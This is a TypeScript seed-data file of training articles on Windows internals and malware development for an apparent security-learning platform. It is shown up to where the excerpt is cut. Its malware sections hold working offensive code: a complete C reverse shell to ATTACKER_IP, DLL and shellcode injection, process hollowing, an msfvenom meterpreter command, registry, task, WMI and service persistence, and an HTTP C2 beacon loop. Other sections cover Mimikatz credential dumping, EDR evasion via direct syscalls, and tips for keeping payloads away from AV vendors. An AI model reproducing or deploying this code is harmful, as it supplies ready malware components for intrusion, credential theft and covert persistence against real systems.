import type { SeedArticle } from "./types";

export const WINDOWS_MALDEV_ARTICLES: SeedArticle[] = [
  // ── win-internals L0-L5 ─────────────────────────────────────────────────
  {
    competencyId: "win-internals", depthTier: 0, title: "Windows Internals Overview", recommendedLevel: 0,
    sections: [
      { heading: "Why Windows internals matter", content: `Understanding how Windows works under the hood is essential for both offensive and defensive security. Active Directory environments dominate enterprise networks, and the vast majority of malware targets Windows.\n\nKnowing the internals — how processes are created, how memory is managed, how the registry works — lets you understand attack techniques at a fundamental level rather than just running tools.`, sortOrder: 0 },
      { heading: "Architecture overview", content: `Windows uses a hybrid kernel architecture:\n\n- **User mode** (Ring 3): Applications, DLLs, subsystem processes (csrss.exe)\n- **Kernel mode** (Ring 0): Executive, kernel, HAL, drivers\n- **ntdll.dll**: Bridge between user mode and kernel — contains system call stubs\n- **Win32 API** (kernel32.dll, user32.dll): High-level functions that wrap ntdll calls\n\nKey subsystems:\n- **Session Manager** (smss.exe): First user-mode process, creates sessions\n- **Client/Server Runtime** (csrss.exe): Console handling, thread creation\n- **Windows Init** (wininit.exe): Starts services.exe and lsass.exe\n- **Local Security Authority** (lsass.exe): Authentication, credential storage`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **PE (Portable Executable)**: Windows executable format (.exe, .dll, .sys)\n- **PEB (Process Environment Block)**: Per-process structure with loaded modules, command line\n- **TEB (Thread Environment Block)**: Per-thread structure with stack info, TLS\n- **EPROCESS/ETHREAD**: Kernel objects representing processes/threads\n- **Handle**: Integer reference to a kernel object (file, process, registry key)\n- **Token**: Security context — groups, privileges, integrity level\n- **SID (Security Identifier)**: Unique identity for users/groups\n- **Registry**: Hierarchical database for system/app configuration\n- **Service**: Background process managed by SCM (services.exe)\n- **WoW64**: Windows on Windows 64 — runs 32-bit apps on 64-bit OS`, sortOrder: 2 },
      { heading: "Sources", content: `- Mark Russinovich, "Windows Internals" (Microsoft Press)\n- MSDN documentation: learn.microsoft.com/en-us/windows\n- Sysinternals Suite: learn.microsoft.com/en-us/sysinternals`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "win-internals", depthTier: 1, title: "Windows Internals Basics", recommendedLevel: 1,
    sections: [
      { heading: "Process and thread management", content: `\`\`\`powershell\n# List processes with details\nGet-Process | Select-Object Id, ProcessName, Path, Company | Format-Table\n\n# Process tree (Sysinternals)\npstree.exe  # or Process Explorer GUI\n\n# Key process relationships:\n# System (PID 4) → smss.exe → csrss.exe, wininit.exe\n# wininit.exe → services.exe, lsass.exe\n# services.exe → svchost.exe (multiple instances)\n# explorer.exe → user applications\n\`\`\`\n\n\`\`\`c\n// Win32 API: Create a process\n#include <windows.h>\nSTARTUPINFO si = { sizeof(si) };\nPROCESS_INFORMATION pi;\nCreateProcess(NULL, "notepad.exe", NULL, NULL, FALSE,\n              0, NULL, NULL, &si, &pi);\n// pi.hProcess = handle to new process\n// pi.hThread = handle to main thread\n// pi.dwProcessId = PID\n\`\`\``, sortOrder: 0 },
      { heading: "Registry fundamentals", content: `\`\`\`powershell\n# Registry hives\n# HKLM\\SYSTEM    → boot config, services, drivers\n# HKLM\\SOFTWARE  → installed software, settings\n# HKLM\\SAM       → local user accounts (protected)\n# HKCU\\          → current user settings\n# HKU\\           → all user profiles\n\n# Common persistence locations\nGet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\nGet-ItemProperty \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\n\n# Query a value\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\"\n\n# Autoruns (Sysinternals) — comprehensive persistence scanner\nautorunsc.exe -accepteula -a * -c -h -s -t\n\`\`\``, sortOrder: 1 },
      { heading: "Sysinternals tools", content: `Essential tools for Windows investigation:\n\n| Tool | Purpose |\n|------|--------|\n| Process Explorer | Process tree, handles, DLLs, strings |\n| Process Monitor | Real-time file/registry/network activity |\n| Autoruns | All auto-start locations (persistence) |\n| TCPView | Active network connections by process |\n| Handle | Open handles by process |\n| Strings | Extract printable strings from binaries |\n| Sigcheck | Verify digital signatures |\n| AccessChk | Effective permissions on files/registry/services |\n\n\`\`\`cmd\n:: Process Monitor filter examples\n:: Show all registry writes by a specific process:\n:: Process Name is malware.exe AND Operation is RegSetValue\n\n:: Show file creates in temp directory:\n:: Path contains \\Temp\\ AND Operation is CreateFile\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Sysinternals documentation: learn.microsoft.com/en-us/sysinternals\n- Mark Russinovich, "Windows Internals" Part 1 & 2\n- MSDN Win32 API reference`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "win-internals", depthTier: 2, title: "Windows Internals in Depth", recommendedLevel: 2,
    sections: [
      { heading: "PE file format", content: `Every Windows executable follows the PE format:\n\n\`\`\`\nPE Structure:\n+------------------+\n| DOS Header       |  ← MZ signature (4D 5A), e_lfanew → PE header\n| DOS Stub         |  ← "This program cannot be run in DOS mode"\n+------------------+\n| PE Signature     |  ← "PE\\0\\0" (50 45 00 00)\n| COFF Header      |  ← Machine type, number of sections, timestamp\n| Optional Header  |  ← Entry point, image base, section alignment\n|   Data Directory |  ← Import/Export tables, resources, relocations\n+------------------+\n| Section Headers  |  ← .text, .data, .rdata, .rsrc, .reloc\n+------------------+\n| Sections         |  ← Actual code and data\n+------------------+\n\`\`\`\n\n\`\`\`python\nimport pefile\npe = pefile.PE(\"binary.exe\")\nprint(f\"Entry point: {hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)}\")\nprint(f\"Image base: {hex(pe.OPTIONAL_HEADER.ImageBase)}\")\n\n# List imports\nfor entry in pe.DIRECTORY_ENTRY_IMPORT:\n    print(f\"\\n{entry.dll.decode()}\")\n    for imp in entry.imports:\n        print(f\"  {imp.name.decode() if imp.name else hex(imp.ordinal)}\")\n\n# List sections\nfor section in pe.sections:\n    print(f\"{section.Name.decode().strip(chr(0)):8s} \"\n          f\"VA:{hex(section.VirtualAddress):10s} \"\n          f\"Size:{section.SizeOfRawData}\")\n\`\`\``, sortOrder: 0 },
      { heading: "Windows security model", content: `**Access tokens** define what a process can do:\n\n\`\`\`powershell\n# View current token\nwhoami /all\n# Shows: username, SID, groups, privileges\n\n# Key privileges:\n# SeDebugPrivilege        → debug any process (credential dumping)\n# SeImpersonatePrivilege  → impersonate tokens (potato attacks)\n# SeBackupPrivilege       → read any file regardless of ACL\n# SeRestorePrivilege      → write any file regardless of ACL\n# SeLoadDriverPrivilege   → load kernel drivers\n# SeTakeOwnershipPrivilege → take ownership of objects\n\`\`\`\n\n**Integrity levels** (Mandatory Integrity Control):\n- Untrusted (0): Sandboxed processes\n- Low (1): Protected Mode IE, Edge\n- Medium (2): Standard user processes\n- High (3): Elevated/admin processes\n- System (4): Services, kernel\n\nA lower-integrity process cannot write to higher-integrity objects (no write-up policy).`, sortOrder: 1 },
      { heading: "Windows services and SCM", content: `\`\`\`powershell\n# Service enumeration\nGet-Service | Where-Object Status -eq Running\nsc.exe query type=service state=all\n\n# Service configuration\nsc.exe qc \"ServiceName\"\n# Shows: binary path, start type, account\n\n# Weak service permissions (privilege escalation vector)\naccesschk.exe -uwcqv \"Everyone\" *  # services writable by Everyone\naccesschk.exe -uwcqv \"Users\" *\n\n# Unquoted service paths\nwmic service get name,displayname,pathname,startmode |\n  findstr /i \"auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v '\"'\n# If path = C:\\Program Files\\My App\\service.exe (unquoted)\n# Windows tries: C:\\Program.exe, C:\\Program Files\\My.exe, ...\n# Drop a malicious exe at one of these paths → privilege escalation\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- PE format specification: learn.microsoft.com/en-us/windows/win32/debug/pe-format\n- pefile library: github.com/erocarrera/pefile\n- Windows Security documentation: learn.microsoft.com/en-us/windows/security\n- AccessChk: Sysinternals`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "win-internals", depthTier: 3, title: "Advanced Windows Internals", recommendedLevel: 3,
    sections: [
      { heading: "Windows API call chain", content: `Understanding how API calls reach the kernel:\n\n\`\`\`\nApplication calls CreateFile()\n  → kernel32.dll!CreateFileW()\n    → kernelbase.dll!CreateFileInternal()\n      → ntdll.dll!NtCreateFile()\n        → syscall instruction (ring 3 → ring 0)\n          → nt!NtCreateFile() [kernel]\n            → I/O Manager → File System Driver\n\`\`\`\n\nSecurity tools (EDR/AV) typically hook at two levels:\n- **User-mode hooks**: Inline hooks in ntdll.dll (patch the function's first bytes to redirect)\n- **Kernel callbacks**: PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks\n\nEvasion techniques target these hook points — either by using direct syscalls (bypassing ntdll hooks) or by unhooking (restoring original ntdll bytes).`, sortOrder: 0 },
      { heading: "Memory management internals", content: `\`\`\`c\n// Virtual memory allocation\nLPVOID addr = VirtualAlloc(\n    NULL,                  // let OS choose address\n    4096,                  // size\n    MEM_COMMIT | MEM_RESERVE,  // commit physical memory\n    PAGE_READWRITE         // RW permissions\n);\n\n// Change page protection\nDWORD old;\nVirtualProtect(addr, 4096, PAGE_EXECUTE_READ, &old);\n// RW → RX is suspicious — common in shellcode execution\n\n// Memory in another process\nHANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\nLPVOID remote = VirtualAllocEx(hProc, NULL, size,\n                               MEM_COMMIT | MEM_RESERVE,\n                               PAGE_READWRITE);\nWriteProcessMemory(hProc, remote, shellcode, size, NULL);\n\`\`\`\n\nVAD (Virtual Address Descriptor) tree tracks all virtual memory regions in a process. Security tools inspect VADs for anomalies: executable pages without backing files, RWX regions, unbacked executable memory.`, sortOrder: 1 },
      { heading: "Authentication and credential storage", content: `\`\`\`\nWindows authentication flow:\n1. User enters credentials (winlogon.exe)\n2. Credentials sent to lsass.exe (Local Security Authority)\n3. LSASS calls authentication package (MSV1_0 for local, Kerberos for domain)\n4. On success: creates access token, starts user session\n\nCredentials stored in LSASS memory:\n- NTLM hashes (MSV1_0 package)\n- Kerberos tickets (TGT, service tickets)\n- WDigest plaintext passwords (if enabled — disabled by default since Win 8.1)\n- DPAPI master keys\n\`\`\`\n\n\`\`\`powershell\n# Credential dumping requires SeDebugPrivilege + High integrity\n# Mimikatz (as admin):\nsekurlsa::logonpasswords    # dump all credentials from LSASS\nsekurlsa::tickets           # dump Kerberos tickets\nlsadump::sam                # dump SAM database\nlsadump::dcsync /user:admin # DCSync (requires domain replication rights)\n\n# Defensive: enable Credential Guard, disable WDigest\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 0\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Mark Russinovich, "Windows Internals" Part 1, Chapters 1-5\n- MSDN: Virtual Memory Functions\n- Mimikatz documentation: github.com/gentilkiwi/mimikatz\n- Microsoft Credential Guard documentation`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "win-internals", depthTier: 4, title: "Expert Windows Internals", recommendedLevel: 4,
    sections: [
      { heading: "Syscalls and the SSDT", content: `Windows system calls go through the System Service Descriptor Table:\n\n\`\`\`c\n// ntdll.dll syscall stub (simplified)\nNtCreateFile:\n    mov r10, rcx          // save first argument\n    mov eax, 0x55         // syscall number (varies by Windows version)\n    syscall               // transition to kernel\n    ret\n\n// In kernel: SSDT maps syscall number → handler function\n// nt!KiSystemServiceTable[0x55] → nt!NtCreateFile\n\`\`\`\n\nSyscall numbers change between Windows versions — a direct syscall must resolve the correct number dynamically:\n\n\`\`\`c\n// Resolve syscall number at runtime\n// 1. Read ntdll.dll from disk (unhooks it)\n// 2. Find the export, read the mov eax, imm32\n// 3. Use that number in your own syscall stub\n\n// Or: Hell's Gate technique\n// Walk ntdll in memory, find Zw* functions (sorted by syscall number),\n// derive the number from the function's position in the export table\n\`\`\`\n\nSecurity tools that rely on ntdll hooks are bypassed when the application makes direct syscalls — the hooked code is never executed.`, sortOrder: 0 },
      { heading: "Object Manager and handles", content: `Every kernel resource is an object managed by the Object Manager:\n\n\`\`\`\nObject namespace:\n\\              (root)\n├── Device     (\\Device\\HarddiskVolume1, \\Device\\Tcp)\n├── BaseNamedObjects  (mutexes, events, sections)\n├── Sessions   (per-session namespaces)\n├── Registry   (\\REGISTRY\\MACHINE, \\REGISTRY\\USER)\n└── ObjectTypes (Process, Thread, File, Key, ...)\n\`\`\`\n\n\`\`\`c\n// Every handle is an index into the process handle table\n// Handle table entry contains:\n// - Pointer to kernel object\n// - Access mask (what operations are allowed)\n// - Attributes (inherit, protect from close)\n\n// ObRegisterCallbacks — kernel API for monitoring handle operations\n// EDR/AV uses this to prevent handle access to lsass.exe:\nOB_CALLBACK_REGISTRATION reg;\nreg.OperationRegistration->ObjectType = PsProcessType;\nreg.OperationRegistration->Operations = OB_OPERATION_HANDLE_CREATE;\nreg.OperationRegistration->PreOperation = HandleCallback;\n// Callback strips PROCESS_VM_READ from handles to lsass\n\`\`\`\n\n\`\`\`cmd\n:: View handles with Sysinternals Handle\nhandle.exe -accepteula -p lsass.exe\n:: View with WinObj (GUI) for the object namespace\n\`\`\``, sortOrder: 1 },
      { heading: "ETW and kernel callbacks", content: `Event Tracing for Windows (ETW) is the kernel's telemetry framework:\n\n\`\`\`powershell\n# List ETW providers\nlogman query providers\nlogman query providers Microsoft-Windows-Kernel-Process\n\n# Key security-relevant providers:\n# Microsoft-Windows-Threat-Intelligence  → PPL-protected, used by Defender\n# Microsoft-Windows-Kernel-Process       → process creation/termination\n# Microsoft-Windows-Kernel-File          → file operations\n# Microsoft-Windows-DotNETRuntime        → .NET assembly loading\n# Microsoft-Windows-PowerShell           → PowerShell execution\n\`\`\`\n\nKernel callbacks that security tools register:\n- \`PsSetCreateProcessNotifyRoutineEx\` — process creation\n- \`PsSetCreateThreadNotifyRoutine\` — thread creation\n- \`PsSetLoadImageNotifyRoutine\` — image (DLL/EXE) loading\n- \`CmRegisterCallbackEx\` — registry operations\n- \`ObRegisterCallbacks\` — handle operations\n\nThese callbacks run in kernel mode and are very difficult to bypass from user mode.`, sortOrder: 2 },
      { heading: "Sources", content: `- Windows Internals Part 2, Chapters 8-11\n- Alex Ionescu, "Syscalls on Windows" (blog series)\n- Pavel Yosifovich, "Windows Kernel Programming" (Leanpub)\n- ETW documentation: learn.microsoft.com/en-us/windows/win32/etw`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "win-internals", depthTier: 5, title: "Windows Internals Deep Dive", recommendedLevel: 5,
    sections: [
      { heading: "NTFS internals", content: `NTFS stores everything in the Master File Table (MFT):\n\n\`\`\`\nMFT Record structure:\n  $STANDARD_INFORMATION  — timestamps, permissions, flags\n  $FILE_NAME             — filename(s), parent directory reference\n  $DATA                  — file content (or pointers to clusters)\n  $INDEX_ROOT            — B-tree index for directories\n\nAlternate Data Streams (ADS):\n  file.txt               — default $DATA stream\n  file.txt:hidden         — named stream (hidden data)\n\`\`\`\n\n\`\`\`cmd\n:: ADS operations\necho secret > file.txt:hidden\nmore < file.txt:hidden\ndir /r  :: list streams\n\n:: Zone.Identifier (Mark of the Web)\n:: Downloaded files get this ADS automatically\nmore < downloaded.exe:Zone.Identifier\n:: [ZoneTransfer]\n:: ZoneId=3  (Internet zone)\n\`\`\`\n\nForensic significance: ADS can hide data from basic directory listings. The Zone.Identifier stream triggers SmartScreen warnings — attackers may strip it to bypass MOTW checks.`, sortOrder: 0 },
      { heading: "Windows kernel architecture", content: `\`\`\`\nKernel components:\n\n┌─────────────────────────────────────────────┐\n│ User Mode                                   │\n│  Applications  │  Subsystem DLLs (ntdll)    │\n├─────────────────────────────────────────────┤\n│ Kernel Mode                                 │\n│  ┌───────────────────────────────────────┐  │\n│  │ Executive                              │  │\n│  │  I/O Manager    │  Object Manager     │  │\n│  │  Memory Manager │  Process Manager    │  │\n│  │  Security RM    │  Config Manager     │  │\n│  │  PnP Manager    │  Power Manager      │  │\n│  ├───────────────────────────────────────┤  │\n│  │ Kernel (ke)                            │  │\n│  │  Scheduling, synchronization, ISR      │  │\n│  ├───────────────────────────────────────┤  │\n│  │ HAL (Hardware Abstraction Layer)       │  │\n│  │  Timer, interrupt controller, DMA      │  │\n│  └───────────────────────────────────────┘  │\n│  Drivers (.sys)                             │\n└─────────────────────────────────────────────┘\n\`\`\`\n\n**Patchguard (Kernel Patch Protection)**: Periodically checks kernel integrity — SSDT, IDT, GDT, critical structures. Modifying these causes BSOD. Works by running verification routines from timer DPCs with obfuscated context.\n\n**Virtualization-Based Security (VBS)**: Uses Hyper-V to create an isolated secure kernel (Secure Kernel Mode). Credential Guard stores credentials in the secure world. Even a compromised kernel can't access VBS-protected memory.`, sortOrder: 1 },
      { heading: "Protected processes and PPL", content: `Protected Process Light (PPL) hierarchy:\n\n\`\`\`\nProtection levels (highest to lowest):\n  WinTcb-Full       — csrss.exe, System\n  WinTcb-Light      — Credential Guard\n  Windows-Full      — smss.exe\n  Windows-Light     — wininit.exe, services.exe\n  Antimalware-Light — Defender, third-party AV/EDR\n  Lsa-Full          — lsass.exe (when RunAsPPL enabled)\n  Lsa-Light         — lsass.exe (default PPL)\n  App-Light         — UWP apps\n  None              — regular processes\n\`\`\`\n\nA process can only open a handle to a process at the same or lower protection level. This is why dumping lsass.exe memory fails when it runs as PPL — even an admin process (protection=None) can't get PROCESS_VM_READ.\n\nBypasses require:\n- Loading a vulnerable signed driver (bring-your-own-vulnerable-driver, BYOVD)\n- Exploiting a kernel vulnerability\n- Using a tool signed with the appropriate EKU certificate`, sortOrder: 2 },
      { heading: "Sources", content: `- Mark Russinovich, "Windows Internals" Part 1 & 2 (7th Edition)\n- Alex Ionescu, "Protected Processes Light, Part 1-3" (blog)\n- NTFS documentation: flatcap.github.io/linux-ntfs\n- Microsoft VBS documentation: learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard`, sortOrder: 3 },
    ],
  },

  // ── maldev-techniques L0-L5 ─────────────────────────────────────────────
  {
    competencyId: "maldev-techniques", depthTier: 0, title: "Malware Development Overview", recommendedLevel: 0,
    sections: [
      { heading: "Why study malware development", content: `Understanding malware development is essential for security professionals on both sides:\n\n- **Red teamers**: Build custom tooling that evades detection during authorized engagements\n- **Blue teamers**: Understand how malware works to build better detections\n- **Malware analysts**: Recognize patterns and techniques during reverse engineering\n- **Threat intelligence**: Map techniques to MITRE ATT&CK framework\n\nThis knowledge is applied within authorized penetration testing, red team operations, and security research contexts.`, sortOrder: 0 },
      { heading: "Core concepts", content: `- **Payload**: The actual malicious functionality (reverse shell, keylogger, RAT)\n- **Loader**: Code that loads and executes the payload in memory\n- **Dropper**: Delivers the payload to disk, then executes the loader\n- **Stager**: Small initial payload that downloads the full payload\n- **Implant**: Long-running agent that maintains access (C2 beacon)\n- **C2 (Command and Control)**: Server infrastructure that controls implants\n- **Shellcode**: Position-independent machine code\n- **DLL**: Dynamic-Link Library — can be loaded into any process`, sortOrder: 1 },
      { heading: "Development languages", content: `| Language | Strengths | Common use |\n|----------|-----------|------------|\n| C/C++ | Full API access, small binaries, no runtime | Implants, drivers, shellcode |\n| C# (.NET) | Rapid development, reflection, easy API calls | Loaders, post-exploitation |\n| Rust | Memory safety, small binaries, no runtime | Modern implants |\n| Go | Cross-compilation, static binaries | C2 frameworks, droppers |\n| Python | Rapid prototyping | Proof of concepts, scripts |\n| PowerShell | Built into Windows, .NET access | Living-off-the-land |`, sortOrder: 2 },
      { heading: "Sources", content: `- MITRE ATT&CK: attack.mitre.org\n- "Malware Development for Ethical Hackers" — course by Sektor7\n- Red Team Notes: ired.team`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "maldev-techniques", depthTier: 1, title: "Malware Development Basics", recommendedLevel: 1,
    sections: [
      { heading: "Windows API for offensive use", content: `\`\`\`c\n#include <windows.h>\n#include <stdio.h>\n\n// Process enumeration\n#include <tlhelp32.h>\nvoid list_processes() {\n    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n    PROCESSENTRY32 pe = { .dwSize = sizeof(pe) };\n    if (Process32First(snap, &pe)) {\n        do {\n            printf("PID: %lu  %s\\n", pe.th32ProcessID, pe.szExeFile);\n        } while (Process32Next(snap, &pe));\n    }\n    CloseHandle(snap);\n}\n\n// File operations\nvoid drop_file() {\n    char path[MAX_PATH];\n    GetTempPathA(MAX_PATH, path);\n    strcat(path, "payload.exe");\n    // Write payload bytes to path...\n}\n\n// Registry persistence\nvoid persist() {\n    HKEY hKey;\n    RegOpenKeyExA(HKEY_CURRENT_USER,\n        "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",\n        0, KEY_SET_VALUE, &hKey);\n    RegSetValueExA(hKey, "Update", 0, REG_SZ,\n        (BYTE*)"C:\\\\path\\\\to\\\\implant.exe", 30);\n    RegCloseKey(hKey);\n}\n\`\`\``, sortOrder: 0 },
      { heading: "Basic reverse shell", content: `\`\`\`c\n#include <winsock2.h>\n#include <windows.h>\n#pragma comment(lib, "ws2_32")\n\n// TCP reverse shell — connects back to attacker, provides cmd.exe\nint main() {\n    WSADATA wsa;\n    WSAStartup(MAKEWORD(2,2), &wsa);\n\n    SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP,\n                             NULL, 0, 0);\n    struct sockaddr_in addr;\n    addr.sin_family = AF_INET;\n    addr.sin_port = htons(4444);\n    addr.sin_addr.s_addr = inet_addr("ATTACKER_IP");\n\n    connect(sock, (struct sockaddr*)&addr, sizeof(addr));\n\n    STARTUPINFO si = { .cb = sizeof(si) };\n    si.dwFlags = STARTF_USESTDHANDLES;\n    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;\n\n    PROCESS_INFORMATION pi;\n    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE,\n                   CREATE_NO_WINDOW, NULL, NULL, &si, &pi);\n    WaitForSingleObject(pi.hProcess, INFINITE);\n    return 0;\n}\n\`\`\`\n\nThis is the simplest form — no encryption, no evasion, easily detected. Real implants add encryption, sleep timers, and modular functionality.`, sortOrder: 1 },
      { heading: "Compilation and testing", content: `\`\`\`bash\n# Cross-compile for Windows from Linux\nx86_64-w64-mingw32-gcc reverse_shell.c -o shell.exe -lws2_32\n\n# Compile with Visual Studio (Windows)\ncl.exe /EHsc source.c /link ws2_32.lib\n\n# Test in a safe environment:\n# 1. Windows VM with Defender disabled (for initial testing)\n# 2. FlareVM (MANDIANT forensics/RE VM)\n# 3. CommandoVM (Mandiant offensive VM)\n\n# Check if payload triggers AV\n# DO NOT upload to VirusTotal (shares with AV vendors)\n# Use: antiscan.me (private scanning)\n# Or test locally against Defender\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- MSDN Win32 API reference\n- ired.team (Red Team Notes)\n- Sektor7 courses (Malware Development Essentials)\n- MITRE ATT&CK technique pages`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "maldev-techniques", depthTier: 2, title: "Malware Development in Depth", recommendedLevel: 2,
    sections: [
      { heading: "Process injection techniques", content: `Inject code into another process's address space:\n\n\`\`\`c\n// Classic DLL injection\n// 1. Open target process\nHANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n\n// 2. Allocate memory in target for DLL path\nLPVOID addr = VirtualAllocEx(hProc, NULL, strlen(dllPath)+1,\n                             MEM_COMMIT, PAGE_READWRITE);\n\n// 3. Write DLL path to target memory\nWriteProcessMemory(hProc, addr, dllPath, strlen(dllPath)+1, NULL);\n\n// 4. Create remote thread calling LoadLibraryA with our DLL path\nHANDLE hThread = CreateRemoteThread(hProc, NULL, 0,\n    (LPTHREAD_START_ROUTINE)GetProcAddress(\n        GetModuleHandleA("kernel32.dll"), "LoadLibraryA"),\n    addr, 0, NULL);\n\`\`\`\n\n\`\`\`c\n// Shellcode injection (no DLL on disk)\n// Same steps 1-3 but write shellcode instead of a path\n// Step 3b: Change memory protection to RX\nVirtualProtectEx(hProc, addr, size, PAGE_EXECUTE_READ, &old);\n// Step 4: Create remote thread at shellcode address\nCreateRemoteThread(hProc, NULL, 0,\n    (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL);\n\`\`\``, sortOrder: 0 },
      { heading: "Shellcode generation and execution", content: `\`\`\`bash\n# Generate shellcode with msfvenom\nmsfvenom -p windows/x64/meterpreter/reverse_tcp \\\\\n  LHOST=10.10.14.1 LPORT=4444 -f c\n\n# Output formats: c, python, csharp, raw, exe, dll\n# Encoders: -e x64/xor_dynamic, -e x64/zutto_dekiru\n# Iterations: -i 3 (encode multiple times)\n\`\`\`\n\n\`\`\`c\n// Shellcode runner patterns\n\n// 1. VirtualAlloc + memcpy + function pointer\nLPVOID mem = VirtualAlloc(NULL, sizeof(shellcode),\n                          MEM_COMMIT, PAGE_EXECUTE_READWRITE);\nmemcpy(mem, shellcode, sizeof(shellcode));\n((void(*)())mem)();\n\n// 2. Callback execution (less obvious)\nEnumDesktopsA(GetProcessWindowStation(),\n              (DESKTOPENUMPROCA)mem, 0);\n// or: CreateTimerQueueTimer, EnumChildWindows,\n//     CertEnumSystemStore, etc.\n\`\`\``, sortOrder: 1 },
      { heading: "Persistence mechanisms", content: `Common persistence techniques (MITRE ATT&CK TA0003):\n\n\`\`\`powershell\n# Registry Run keys (T1547.001)\nNew-ItemProperty -Path "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" \\\n  -Name "Updater" -Value "C:\\Users\\Public\\implant.exe"\n\n# Scheduled tasks (T1053.005)\nschtasks /create /tn "SystemUpdate" /tr "C:\\Users\\Public\\implant.exe" \\\n  /sc onlogon /ru SYSTEM\n\n# WMI event subscription (T1546.003) — survives reboots, hard to find\n$Filter = Set-WmiInstance -Class __EventFilter -Namespace "root\\subscription" \\\n  -Arguments @{Name="Updater"; EventNamespace="root\\cimv2";\n  QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}\n\n# Service creation (T1543.003)\nsc.exe create UpdateSvc binPath= "C:\\Users\\Public\\implant.exe" start= auto\n\n# DLL search order hijacking (T1574.001)\n# Place malicious DLL in application directory — loaded before system DLL\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- MITRE ATT&CK: Execution (TA0002), Persistence (TA0003)\n- ired.team/offensive-security/code-injection-process-injection\n- msfvenom documentation: docs.metasploit.com\n- Elastic Security: "Ten Process Injection Techniques"`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "maldev-techniques", depthTier: 3, title: "Advanced Malware Development", recommendedLevel: 3,
    sections: [
      { heading: "Advanced injection: process hollowing", content: `Process hollowing creates a legitimate-looking process but replaces its code:\n\n\`\`\`c\n// 1. Create target process in SUSPENDED state\nSTARTUPINFO si = { .cb = sizeof(si) };\nPROCESS_INFORMATION pi;\nCreateProcessA("C:\\\\Windows\\\\System32\\\\svchost.exe",\n               NULL, NULL, NULL, FALSE,\n               CREATE_SUSPENDED, NULL, NULL, &si, &pi);\n\n// 2. Read the PEB to find the image base\nCONTEXT ctx = { .ContextFlags = CONTEXT_FULL };\nGetThreadContext(pi.hThread, &ctx);\n// PEB address is in ctx.Rdx (64-bit)\n// Image base is at PEB + 0x10\nReadProcessMemory(pi.hProcess, (PVOID)(ctx.Rdx + 0x10),\n                  &imageBase, sizeof(imageBase), NULL);\n\n// 3. Unmap the original executable\nNtUnmapViewOfSection(pi.hProcess, imageBase);\n\n// 4. Allocate memory and write our PE\nLPVOID newBase = VirtualAllocEx(pi.hProcess, imageBase,\n                                peSize, MEM_COMMIT | MEM_RESERVE,\n                                PAGE_EXECUTE_READWRITE);\nWriteProcessMemory(pi.hProcess, newBase, peBuffer, peSize, NULL);\n\n// 5. Update entry point in thread context\nctx.Rcx = newBase + entryPointRVA;\nSetThreadContext(pi.hThread, &ctx);\n\n// 6. Resume — process runs our code under svchost.exe's name\nResumeThread(pi.hThread);\n\`\`\``, sortOrder: 0 },
      { heading: "C2 communication patterns", content: `\`\`\`c\n// HTTP-based C2 (blends with normal web traffic)\n#include <winhttp.h>\n#pragma comment(lib, "winhttp.lib")\n\nvoid beacon() {\n    while (1) {\n        // Check in with C2 server\n        HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0",\n            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, 0);\n        HINTERNET hConnect = WinHttpConnect(hSession,\n            L"c2.example.com", 443, 0);\n        HINTERNET hRequest = WinHttpOpenRequest(hConnect,\n            L"GET", L"/api/tasks", NULL, NULL, NULL,\n            WINHTTP_FLAG_SECURE);\n        WinHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, 0);\n        WinHttpReceiveResponse(hRequest, NULL);\n\n        // Parse response, execute task, send results\n        // ...\n\n        // Jittered sleep (avoid fixed intervals)\n        DWORD sleep_ms = 30000 + (rand() % 10000);\n        Sleep(sleep_ms);\n    }\n}\n\`\`\`\n\nC2 channels: HTTP/HTTPS, DNS (txt/cname records), named pipes (SMB), WebSockets. Advanced C2 uses domain fronting, CDN-based routing, or legitimate cloud services (Slack, Teams, OneDrive) as communication channels.`, sortOrder: 1 },
